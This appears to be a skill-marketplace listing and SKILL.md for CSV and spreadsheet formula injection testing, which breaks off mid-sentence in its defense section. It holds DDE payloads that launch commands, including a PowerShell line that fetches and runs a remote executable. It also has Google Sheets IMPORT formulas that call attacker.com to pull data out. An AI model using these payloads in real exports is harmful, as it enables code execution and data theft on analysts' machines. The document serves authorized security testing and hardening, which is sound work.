Csv Formula Injection
Test CSV and spreadsheet exports for formula, DDE, and cloud-sheet injection when user-controlled data becomes spreadsheet cells.
Overview
csv-formula-injection is an agent skill most often used in Ship (also Build integrations, Operate iterate) that guides authorized testing for formula and DDE injection in CSV and spreadsheet export paths.
Install
npx skills add https://github.com/yaklang/hack-skills --skill csv-formula-injectionWhat is this skill?
- Covers CSV/spreadsheet formula injection triggers (=, +, -, @) and lab DDE-style patterns
- Documents Excel, LibreOffice Calc, and Google Sheets IMPORT-style cloud primitives
- Includes obfuscation angles and a controlled, consent-first testing methodology
- Routes testers to prefix characters when validating back-office reports and user exports
- Stresses explicit authorization—no client-side execution tests without program rules
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
User-controlled fields in CSV exports can become executable spreadsheet formulas when analysts open files in Excel or similar tools.
Who is it for?
Builders running permitted security reviews on reporting, admin export, and import features that feed spreadsheets.
Skip if: Unauthorized targets, mass phishing via crafted CSV, or production testing without explicit scope and consent.
When should I use this skill?
Exports, imports, or user fields feed spreadsheets or reporting tools and you need authorized formula/DDE injection test cases.
What do I get? / Deliverables
You can reproduce prefix and DDE-style issues in a lab, document findings, and harden serializers and download headers before production exposure.
- Prefix and DDE test cell matrix for lab reproduction
- Documented findings with severity and remediation notes for serializers and Content-Disposition headers
Recommended Skills
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Canonical shelf is Ship → security because the skill governs authorized verification before release of export, import, and reporting features. Subphase security matches offensive-defensive testing of data-handling paths that become Excel, LibreOffice, or Google Sheets formulas.
Where it fits
Sanitize ticket export columns before the billing CSV hits a finance team’s Excel macros.
Pre-release pentest pass on admin ‘download all users’ reporting endpoints.
Reproduce a researcher report that a name field executes =HYPERLINK when opened in LibreOffice.
How it compares
Use as a focused spreadsheet injection playbook during Ship security review, not as generic OWASP Top 10 coverage or a passive SAST-only skill.
Common Questions / FAQ
Who is csv-formula-injection for?
Solo founders and indie devs with bug-bounty or internal appsec hats who own CSV export, CRM dumps, or ticketing downloads.
When should I use csv-formula-injection?
In Ship security before launching exports; in Build integrations when designing import/export APIs; and in Operate iterate when a customer reports odd behavior opening your CSV in Excel.
Is csv-formula-injection safe to install?
The skill describes high-impact lab payloads—review Security Audits on this page and only run tests on systems you are explicitly authorized to assess.
SKILL.md
READMESKILL.md - Csv Formula Injection
# SKILL: CSV Formula Injection > **AI LOAD INSTRUCTION**: This skill covers formula/DDE-style injection in CSV and spreadsheet contexts, obfuscation, cloud-sheet primitives, and safe testing methodology. Use only where **explicitly authorized**; payloads that invoke local commands or remote fetches are **impactful**—prefer lab targets and document consent. Do not target end users without program rules allowing client-side execution tests. ## 0. QUICK START Characters that may trigger formula evaluation when a cell is opened in Excel, LibreOffice Calc, or similar (often only if the cell is interpreted as a formula): ```text = + - @ ``` Test cells may look like: ```csv name,value test,=1+1 test,+1+1 test,-1+1 test,@SUM(1+1) ``` **Routing note**: when testing CSV exports, back-office reports, or user data opened in spreadsheets, prioritize these prefix characters. --- ## 1. DDE INJECTION (EXCEL / LIBREOFFICE) Dynamic Data Exchange (DDE) and external call patterns historically abused in spreadsheets. Examples for **controlled lab** reproduction: ```text DDE("cmd";"/C calc";"!A0")A0 ``` ```text @SUM(1+1)*cmd|' /C calc'!A0 ``` ```text =2+5+cmd|' /C calc'!A0 ``` ```text =cmd|' /C calc'!'A1' ``` PowerShell-style chaining (lab only; replace host and payload with benign equivalents): ```text =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 ``` --- ## 2. OBFUSCATION Defensive parsers may strip obvious patterns; testers may try noise and spacing (still only where allowed): ```text AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A ``` Extra whitespace after `=`: ```text = cmd|'/c calc.exe'!A ``` Dispersed characters / unusual spacing (conceptual pattern—adjust per parser): ```text = C m D |'/c calc.exe'!A ``` `rundll32` style: ```text =rundll32|'URL.dll,OpenURL calc.exe'!A ``` --- ## 3. GOOGLE SHEETS If exported data is later opened in **Google Sheets**, or sheets pull from untrusted CSV, these functions can cause **outbound requests** or **cross-document data pulls**: **Data exfiltration / probe (replace URL with your authorized callback):** ```text =IMPORTXML("http://attacker.com/", "//a/@href") ``` Other high-risk imports: ```text =IMPORTRANGE("spreadsheet_url", "range") =IMPORTHTML("http://attacker.com/table", "table", 1) =IMPORTFEED("http://attacker.com/feed.xml") =IMPORTDATA("http://attacker.com/data.csv") ``` Document which function executed and what network side effects occurred. --- ## 4. TESTING METHODOLOGY 1. **Map sinks** — Any feature that emits **CSV, XLSX, or tab-separated** output: admin exports, audit logs, user rosters, billing reports, search results. 2. **Trace user-controlled fields** — Profile fields, ticket titles, transaction memos, tags, filenames in ZIP exports—any column that echoes stored input. 3. **Inject formula prefixes** — Start with benign arithmetic (`=1+1`, `+1+1`) to detect evaluation; escalate only per rules. 4. **Open in target software** — Match victim workflow: Excel desktop, LibreOffice, Google Sheets import, locale-specific decimal separators. 5. **Evidence** — Screenshot/capture whether the cell shows a calculated result, a security warning, or DDE prompt; note product version. **Note**: focus on the `user input -> export -> opened in spreadsheet software` chain. --- ## 5. DEFENSE Application and export-layer mitigations: - **Prefix with single quote** — In many spreadsheet apps, leading `'` forces **text** interpretation: `'=cmd|...` displays literally. - **Prefix with tab** — Some pipelines treat tab-prefixed fields as non-formula text when ingested correctly. - **Strip or neutralize leading triggers** — Remove or escape leading `=`, `+`, `-`, `@` (and Unicode lookalikes) at export time. - **CSV encoding** — Use